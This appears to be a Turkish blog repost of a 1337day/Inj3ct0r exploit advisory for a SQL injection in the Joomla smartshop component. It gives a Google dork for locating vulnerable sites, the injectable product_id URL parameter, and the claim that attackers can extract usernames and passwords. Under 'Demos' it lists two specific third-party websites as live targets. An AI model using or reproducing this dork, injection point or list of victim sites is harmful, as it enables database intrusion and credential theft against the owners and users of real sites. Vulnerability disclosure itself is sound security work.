Joomla Component – smartshop SQL Injection Vulnerability

Joomla Component – smartshop eklentisinde SQL Injection SQL açığı bulunmuş olup, Açığın oluşum yeri ve açık hakkında açık bulucunun bilgilendirmesi aşağıda yer almaktadır.

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Zikou-16 member from Inj3ct0r Team                 1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
-------------------------------------------------------------------
Joomla Component - smartshop SQL Injection Vulnerability 
-------------------------------------------------------------------
 
#####
# Author => Zikou-16
# E-mail => zikou16x@gmail.com
# Facebook => http://fb.me/Zikou.se
# Google Dork => inurl:"com_smartshop"
# Tested on : Windows 7 , Backtrack 5r3
####
 
#=> Exploit Info :
------------------
# The attacker can access to the database & get username & password ...
------------------
 
#=> SQL Injection 
 
http://[target]/[path]/index.php?option=com_smartshop&controller=smartshop_products&task=details&parentid=[ID]&catid=[ID]&product_id=25'[inj3ct h3re]
 
------------------------------
 
#=> Demos :
 
http://www.aktenvernichter.ch/index.php?option=com_smartshop&controller=smartshop_products&task=details&parentid=1&catid=12&product_id=242
 
http://www.destructeurs.ch/index.php?option=com_smartshop&controller=smartshop_products&task=details&parentid=147&catid=4&product_id=35

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir